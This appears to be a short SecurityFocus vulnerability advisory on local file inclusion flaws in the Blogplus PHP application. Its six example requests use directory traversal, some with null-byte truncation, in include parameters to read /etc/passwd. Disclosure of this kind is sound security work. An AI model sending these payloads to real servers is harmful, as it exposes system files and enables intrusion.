Blogplus Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example requests are available:

http://www.example.com/path/includes/block_center_down.php?row_mysql_blocks_center_down[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_center_top.php?row_mysql_blocks_center_top[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/block_right.php?row_mysql_blocks_right[file]=../../../../../../etc/passwd
http://www.example.com/path/includes/window_down.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
http://www.example.com/path/includes/window_top.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus